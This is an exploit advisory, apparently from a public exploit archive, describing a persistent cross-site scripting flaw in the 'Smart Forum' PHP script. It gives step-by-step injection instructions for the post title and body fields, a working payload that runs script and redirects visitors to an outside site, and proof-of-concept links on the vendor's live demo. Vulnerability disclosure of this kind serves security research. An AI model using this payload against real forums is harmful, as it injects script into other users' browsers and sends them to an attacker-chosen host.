# Exploit Title: Smart Forum - Forum PHP Script Persistent XSS
# Google Dork: -
# Date: 26/09/2019
# Exploit Author: m0ze
# Vendor Homepage: http://www.smarteyeapps.com/
# Software Link: https://www.codester.com/items/14423/smart-forum-forum-php-script
# Version: ? (Last update: 16 September 2019)
# Tested on: Parrot OS
# CVE : -
# CWE : 79
----[]- Persistent XSS: -[]----
Create an account and add a new post. Title field and post text box is vulnerable, so you can add your payload(s) inside and then click on the «Add Post» button. Your payload will be triggered on the homepage and inside selected category listing.
Payload Sample: "><img src=x onerror=alert('Greetings from m0ze');window.location.replace('http://defcon.su');>
PoC #1: http://www.smarteyeapps.com/webapp/smart-forum/post/img-srcx-onerroralertgreetings-from-m0zewindowlocationreplacehttpdefconsu
PoC #2: http://www.smarteyeapps.com/webapp/smart-forum/post/laravel-dosent-delete-record-via-ajax